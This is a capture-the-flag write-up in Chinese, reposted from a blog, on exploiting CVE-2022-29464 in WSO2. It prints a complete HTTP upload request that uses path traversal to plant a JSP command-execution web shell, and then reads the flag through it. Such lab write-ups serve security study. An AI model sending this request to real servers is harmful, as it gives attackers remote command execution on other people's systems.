春秋云境:CVE-2022-29464(WSO2文件上传漏洞)

目录

一、题目

二、burp改包  


文章来源地址https://uudwc.com/A/aYN5y

一、题目

进入题目:

是一个登录页面 

 这题确实没什么思路,所以看了官方POC:

因为这个漏洞已经被国家cnnvd收入了

二、burp改包  

burp抓包:不需要登录,刷新即可。

 发送到重放器:根据官方POC更改即可:

这两个参数需要用本机抓包的:

Host: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Accept: */*
POST /fileupload/toolsAny HTTP/2
Host: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 896
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0


--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp"

<FORM>
    <INPUT name='cmd' type=text>
    <INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"</br>"; }
        }  catch(IOException e) {   e.printStackTrace();   }
    }
%>
        <%=output %>
--4ef9f369a86bfaadf5ec3177278d49c0--

 如图:

在次访问登录网站,带有文件上传的网站:

 https://xxxxx/authenticationendpoint/test2.jsp

 cat /flag访问falg:

 flag{5d7b1e3f-8d0b-4424-8365-651780b9b215}

原文地址:https://blog.csdn.net/m0_65712192/article/details/130198150

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请联系站长进行投诉反馈,一经查实,立即删除!

h
上一篇 2023年09月23日 20:54
【华为机考真题】区块链文件转储系统,JAVA 题解 | 华为OD机试考生(新抽中题)
下一篇 2023年09月23日 20:59